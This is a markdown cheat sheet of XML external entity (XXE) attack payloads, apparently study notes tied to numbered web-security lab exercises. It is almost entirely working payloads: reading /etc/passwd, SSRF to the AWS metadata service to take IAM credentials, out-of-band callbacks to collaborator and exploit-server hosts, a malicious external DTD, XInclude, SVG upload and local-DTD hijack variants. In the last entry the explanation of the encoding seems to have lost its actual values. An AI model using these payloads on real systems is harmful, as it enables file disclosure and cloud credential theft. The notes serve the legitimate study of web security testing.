[XXE - XEE - XML External Entity - HackTricks](https://book.hacktricks.wiki/en/pentesting-web/xxe-xee-xml-external-entity.html#xxe---xee---xml-external-entity)
[XXE Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection)
##### XXE – File disclosure via external entity (no encoding)
```http
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<stockCheck>
<productId>&xxe;</productId>
<storeId>1</storeId>
</stockCheck>
```
**Context:** XML input parsed with external entity support enabled
**Encoding:** None
**Source:** [[1. Exploiting XXE using external entities to retrieve files]]
---
##### XXE – SSRF to EC2 Metadata Service (IAM credential exfiltration)
```http
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin">
]>
<stockCheck>
<productId>&xxe;</productId>
<storeId>1</storeId>
</stockCheck>
```
**Context:** XML parsed insecurely with external entity support, allowing SSRF to internal AWS metadata endpoint
**Encoding:** None
**Source:** [[2. Exploiting XXE to perform SSRF attacks]]
---
##### XXE – Blind with OOB interaction (DNS/HTTP pingback via Collaborator)
```http
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE stockCheck [
<!ENTITY xxe SYSTEM "http://YOUR-COLLAB-ID.burpcollaborator.net">
]>
<stockCheck>
<productId>&xxe;</productId>
</stockCheck>
```
**Context:** XML parsed silently with external entity support; vulnerable endpoint does not reflect any input in response
**Encoding:** None
**Source:** [[3. Blind XXE with out-of-band interaction]]
---
##### XXE – Blind via parameter entity injection (OOB DNS/HTTP)
```http
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE stockCheck [
<!ENTITY % xxe SYSTEM "http://YOUR-COLLABORATOR-ID.burpcollaborator.net">
%xxe;
]>
<stockCheck>
<productId>1</productId>
</stockCheck>
```
**Context:** External entity definitions blocked, but parameter entity expansion is still allowed in DTD
**Encoding:** None
**Source:** [[4. Blind XXE with out-of-band interaction via XML parameter entities]]
---
##### XXE – Blind file exfiltration via error message (external DTD)
```http
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-server.net/evil"> %xxe;]>
<stockCheck>
<productId>1</productId>
</stockCheck>
```
**Context:** XML parser does not return parsed data, but leaks file contents through an error message triggered by entity expansion
**Encoding:** None
**Source:** [[6. Exploiting blind XXE to retrieve data via error messages]]
**Malicious DTD (`evil`):**
```xml
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'file:///invalid/%file;'>">
%eval;
%exfil;
```
---
##### XInclude – Local file retrieval via XML inclusion directive
```js
<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>
```
**Context:** User input is embedded into an XML structure parsed server-side; DTDs are restricted but XInclude is enabled
**Encoding:** URL-encoding
**Source:** [[7. Exploiting XInclude to retrieve files]]
---
##### XXE – File disclosure via SVG avatar upload (Apache Batik)
```xml
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [
<!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<svg width="128px" height="128px"
xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink"
version="1.1">
<text font-size="16" x="0" y="16">&xxe;</text>
</svg>
```
**Context:** SVG avatar uploaded to a blog post comment; parsed by Apache Batik which supports external entity resolution
**Encoding:** None
**Source:** [[8. Exploiting XXE via image file upload]]
---
##### XXE – File disclosure via local DTD hijack (ISOamso redefinition)
```http
<!DOCTYPE message [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
'>
%local_dtd;
]>
```
**Context:**
Application parses user-injected XML but blocks user-defined DTDs. However, it allows referencing **local system DTDs**, such as the GNOME `docbookx.dtd`, and accepts redefinition of its entities like `%ISOamso`.
**Encoding:**
Hex/decimal entity encoding used to bypass filters (`%` = `%`, `&` = `&`, `'` = `'`)
**Source:** [[9. Exploiting XXE to retrieve data by repurposing a local DTD]]